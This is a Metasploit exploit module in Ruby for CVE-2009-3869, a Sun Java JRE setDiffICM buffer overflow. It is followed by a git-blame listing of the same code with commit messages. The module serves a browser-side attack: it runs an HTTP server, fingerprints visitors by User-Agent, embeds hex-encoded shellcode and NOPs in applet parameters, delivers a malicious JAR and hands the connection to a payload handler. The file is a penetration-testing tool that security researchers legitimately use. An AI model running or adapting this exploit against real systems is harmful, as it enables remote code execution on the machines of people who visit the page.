modules/exploits/multi/browser/java_setdifficm_bof.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
        'Description' => %q{
          This module exploits a flaw in the setDiffICM function in the Sun JVM.

          The payload is serialized and passed to the applet via PARAM tags. It must be
          a native payload.

          The effected Java versions are JDK and JRE 6 Update 16 and earlier,
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
          earlier, and SDK and JRE 1.3.1_26 and earlier.

          NOTE: Although all of the above versions are reportedly vulnerable, only
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jduck'
        ],
        'References' => [
          [ 'CVE', '2009-3869' ],
          [ 'OSVDB', '59710' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-078' ]
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true
        },
        'Targets' => [
=begin

No automatic targetting for now ...

          [ 'J2SE 1.6_16 Automatic',
            {
              'Platform' => %w{ linux osx win },
              'Arch' => [ARCH_X86, ARCH_PPC]
            }
          ],
=end
          [
            'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-11-04',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def on_request_uri(cli, req)
    # Create a cached mapping between IP and detected target
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    @targetcache[cli.peerhost][:update] = Time.now.to_i

    if (target.name =~ /Automatic/)
      case req.headers['User-Agent']
      when /Windows/i
        print_status('Choosing a Windows target')
        @targetcache[cli.peerhost][:target] = targets[1]
      when /PPC Mac OS X/i
        print_status('Choosing a Mac OS X PPC target')
        @targetcache[cli.peerhost][:target] = targets[2]
      when /Intel Mac OS X/i
        print_status('Choosing a Mac OS X x86 target')
        @targetcache[cli.peerhost][:target] = targets[3]
      else
        print_status("Unknown target for: #{req.headers['User-Agent']}")
      end
    end

    # Clean the cache
    rmq = []
    @targetcache.each_key do |addr|
      if (Time.now.to_i > @targetcache[addr][:update] + 60)
        rmq.push addr
      end
    end

    rmq.each { |addr| @targetcache.delete(addr) }

    # Request processing
    if (!req.uri.match(/\.jar$/i))

      # Redirect to the base directory so the applet code loads...
      if (!req.uri.match(%r{/$}))
        print_status('Sending redirect so path ends with / ...')
        send_redirect(cli, get_resource + '/', '')
        return
      end

      # Display the applet loading HTML
      print_status('Sending HTML')
      send_response_html(cli, generate_html(payload.encoded),
                         {
                           'Content-Type' => 'text/html',
                           'Pragma' => 'no-cache'
                         })
      return
    end

    # Send the actual applet over
    print_status('Sending applet')
    send_response(cli, generate_applet(cli, req),
                  {
                    'Content-Type' => 'application/octet-stream',
                    'Pragma' => 'no-cache'
                  })

    # Handle the payload
    handler(cli)
  end

  def generate_html(pl)
    html = <<~EOF
      <html>
      <head>
      <!-- <meta http-equiv=refresh content=10 /> -->
      </head>
      <body>
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
      <param name='sc' value='SCODE' />
      <param name='np' value='NOPS' />
      </applet>
      </body>
      </html>
    EOF
    # finalize html
    jar_name = rand_text_alphanumeric(32) + '.jar'
    html.gsub!(/JARNAME/, jar_name)

    # put payload into html
    debug_payload = false
    pload = ''
    pload << "\xcc" if debug_payload
    pload << pl
    if ((pload.length % 4) > 0)
      pload << rand_text((4 - (pload.length % 4)))
    end
    if debug_payload
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
    end
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

    # put nops into html
    nops = "\x90\x90\x90\x90"
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

    return html
  end

  def exploit
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2009-3869.jar')
    fd = File.open(path, 'rb')
    @jar_data = fd.read(fd.stat.size)
    fd.close

    super
  end

  def generate_applet(cli, _req)
    if (target.name =~ /Automatic/)
      if (@targetcache[cli.peerhost][:target])
        @targetcache[cli.peerhost][:target]
      else
        return ''
      end
    else
      target
    end

    return @jar_data
  end
end
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`Rank = GreatRanking`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`#`
			`# This module acts as an HTTP server`
			`#`
			`include Msf::Exploit::Remote::HttpServer::HTML`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a flaw in the setDiffICM function in the Sun JVM.`

			`The payload is serialized and passed to the applet via PARAM tags. It must be`
			`a native payload.`

			`The effected Java versions are JDK and JRE 6 Update 16 and earlier,`
			`JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and`
			`earlier, and SDK and JRE 1.3.1_26 and earlier.`

			`NOTE: Although all of the above versions are reportedly vulnerable, only`
			`1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`'jduck'`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'References' => [`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`[ 'CVE', '2009-3869' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '59710' ],`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`[ 'BID', '36881' ],`
Remove bad references (dead links) 2015-10-27 12:41:32 -05:00			`[ 'ZDI', '09-078' ]`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 1024,`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`'BadChars' => '',`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'DisableNops' => true`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Targets' => [`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`=begin`

			`No automatic targetting for now ...`

			`[ 'J2SE 1.6_16 Automatic',`
			`{`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux osx win },`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`'Arch' => [ARCH_X86, ARCH_PPC]`
			`}`
			`],`
			`=end`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[`
			`'J2SE 1.6_16 on Windows x86',`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`{`
			`'Platform' => 'win',`
			`'Arch' => ARCH_X86`
			`}`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[`
			`'J2SE 1.6_16 on Mac OS X PPC',`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`{`
			`'Platform' => 'osx',`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'Arch' => ARCH_PPC`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`}`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[`
			`'J2SE 1.6_16 on Mac OS X x86',`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`{`
			`'Platform' => 'osx',`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`'Arch' => ARCH_X86`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`}`
			`],`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultTarget' => 0,`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DisclosureDate' => '2009-11-04',`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`def on_request_uri(cli, req)`
			`# Create a cached mapping between IP and detected target`
			`@targetcache \|\|= {}`
			`@targetcache[cli.peerhost] \|\|= {}`
			`@targetcache[cli.peerhost][:update] = Time.now.to_i`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`if (target.name =~ /Automatic/)`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`case req.headers['User-Agent']`
			`when /Windows/i`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`print_status('Choosing a Windows target')`
			`@targetcache[cli.peerhost][:target] = targets[1]`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`when /PPC Mac OS X/i`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`print_status('Choosing a Mac OS X PPC target')`
			`@targetcache[cli.peerhost][:target] = targets[2]`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`when /Intel Mac OS X/i`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`print_status('Choosing a Mac OS X x86 target')`
			`@targetcache[cli.peerhost][:target] = targets[3]`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`else`
			`print_status("Unknown target for: #{req.headers['User-Agent']}")`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`# Clean the cache`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`rmq = []`
			`@targetcache.each_key do \|addr\|`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`if (Time.now.to_i > @targetcache[addr][:update] + 60)`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`rmq.push addr`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`rmq.each { \|addr\| @targetcache.delete(addr) }`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`# Request processing`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`if (!req.uri.match(/\.jar$/i))`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`# Redirect to the base directory so the applet code loads...`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`if (!req.uri.match(%r{/$}))`
			`print_status('Sending redirect so path ends with / ...')`
			`send_redirect(cli, get_resource + '/', '')`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`# Display the applet loading HTML`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`print_status('Sending HTML')`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`send_response_html(cli, generate_html(payload.encoded),`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`{`
			`'Content-Type' => 'text/html',`
			`'Pragma' => 'no-cache'`
			`})`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`# Send the actual applet over`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`print_status('Sending applet')`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`send_response(cli, generate_applet(cli, req),`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`{`
			`'Content-Type' => 'application/octet-stream',`
			`'Pragma' => 'no-cache'`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`# Handle the payload`
			`handler(cli)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`def generate_html(pl)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`html = <<~EOF`
			`<html>`
			`<head>`
			`<!-- <meta http-equiv=refresh content=10 /> -->`
			`</head>`
			`<body>`
			`<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>`
			`<param name='sc' value='SCODE' />`
			`<param name='np' value='NOPS' />`
			`</applet>`
			`</body>`
			`</html>`
			`EOF`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`# finalize html`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`jar_name = rand_text_alphanumeric(32) + '.jar'`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`html.gsub!(/JARNAME/, jar_name)`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`# put payload into html`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`debug_payload = false`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`pload = ''`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`pload << "\xcc" if debug_payload`
			`pload << pl`
			`if ((pload.length % 4) > 0)`
			`pload << rand_text((4 - (pload.length % 4)))`
			`end`
			`if debug_payload`
			`print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))`
			`end`
			`html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`# put nops into html`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`nops = "\x90\x90\x90\x90"`
			`html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`# print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))`
Retab modules 2013-08-30 16:28:54 -05:00
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`return html`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`def exploit`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2009-3869.jar')`
			`fd = File.open(path, 'rb')`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`@jar_data = fd.read(fd.stat.size)`
			`fd.close`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`super`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`def generate_applet(cli, _req)`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`if (target.name =~ /Automatic/)`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`if (@targetcache[cli.peerhost][:target])`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`@targetcache[cli.peerhost][:target]`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`else`
			`return ''`
			`end`
			`else`
Mass rubocop changes 2025-12-17 17:11:13 -05:00			`target`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`return @jar_data`
			`end`
add exploit module for cve-2009-3869 2009-12-17 04:52:40 +00:00			`end`